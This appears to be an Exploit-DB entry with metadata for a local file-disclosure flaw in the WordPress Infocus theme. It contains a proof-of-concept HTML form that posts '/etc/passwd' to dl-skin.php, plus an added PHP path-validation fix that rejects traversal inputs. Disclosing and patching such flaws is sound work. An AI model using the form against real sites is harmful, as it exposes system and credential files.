WordPress Infocus Theme '/infocus/lib/scripts/dl-skin.php' Local File Disclosure Vulnerability
2014-06-08T00:00:00
ID: EDB-ID:39211
Type: exploitdb
Reporter: Felipe Andrian Peixoto
Modified: 2014-06-08T00:00:00
Description
WordPress Infocus Theme '/infocus/lib/scripts/dl-skin.php' Local File Disclosure Vulnerability. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/67934/info
The Infocus theme for WordPress is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
<html>
<body>
<form action="http://www.site.com/wp-content/themes/infocus/lib/scripts/dl-skin.php" method="post">
Download:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit">
</form>
</body>
</html>
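The missing validation described above, shown from the fixing side: an added example, not the theme's own code (the page does not show the source of dl-skin.php), that maps the `_mysite_download_skin` value to a file inside one skins directory and rejects everything else. The function name `resolve_skin_path`, the extension allow-list and the demo directory are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical allow-list: the theme's real skin file types are not shown on the page.
const ALLOWED_EXTENSIONS = ['css', 'zip'];

/**
 * Map a user-supplied skin name to a regular file inside $skinsDir.
 * Returns the canonical path, or null when the request must be refused.
 */
function resolve_skin_path(string $requested, string $skinsDir): ?string
{
    // Refuse empty values and NUL bytes outright.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    // Accept a bare file name only: no directory separators, no absolute paths.
    if ($requested !== basename($requested)
        || !preg_match('/^[A-Za-z0-9._-]+$/', $requested)) {
        return null;
    }
    // Only file types that a skin download legitimately needs.
    $ext = strtolower(pathinfo($requested, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXTENSIONS, true)) {
        return null;
    }
    // Canonicalise (resolves symlinks) and confirm the result is still inside the base.
    $base = realpath($skinsDir);
    $full = realpath($skinsDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $full === false) {
        return null;
    }
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return is_file($full) ? $full : null;
}

// Constructed demo: a temporary skins directory holding one legitimate file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'skins-demo-' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'blue.css', 'body{}');

foreach (['blue.css', '/etc/passwd', '../../wp-config.php', 'missing.css'] as $input) {
    $verdict = resolve_skin_path($input, $dir) === null ? 'rejected' : 'served';
    printf("%-22s => %s\n", $input, $verdict);
}

unlink($dir . DIRECTORY_SEPARATOR . 'blue.css');
rmdir($dir);
```

A handler built this way would call the function on `$_POST['_mysite_download_skin']` and return a 404 for any null result before opening a file.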
{"id": "EDB-ID:39211", "hash": "863a193c822ebd9fcb0d4a4de3df2e72", "type": "exploitdb", "bulletinFamily": "exploit", "title": "WordPress Infocus Theme '/infocus/lib/scripts/dl-skin.php' Local File Disclosure Vulnerability", "description": "WordPress Infocus Theme '/infocus/lib/scripts/dl-skin.php' Local File Disclosure Vulnerability. Webapps exploit for php platform", "published": "2014-06-08T00:00:00", "modified": "2014-06-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/39211/", "reporter": "Felipe Andrian Peixoto", "references": [], "cvelist": [], "lastseen": "2016-02-04T09:43:14", "history": [], "viewCount": 2, "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2016-02-04T09:43:14"}, "dependencies": {"references": [], "modified": "2016-02-04T09:43:14"}, "vulnersScore": -0.4}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/39211/", "sourceData": "source: http://www.securityfocus.com/bid/67934/info\r\n\r\nThe Infocus theme for WordPress is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.\r\n\r\nExploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks. \r\n\r\n<html>\r\n<body>\r\n<form action=\"http://www.site.com/wp-content/themes/infocus/lib/scripts/dl-skin.php\" method=\"post\">\r\nDownload:<input type=\"text\" name=\"_mysite_download_skin\" value=\"/etc/passwd\"><br>\r\n<input type=\"submit\">\r\n</form>\r\n</body>\r\n</html>\r\n", "osvdbidlist": ["101331"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}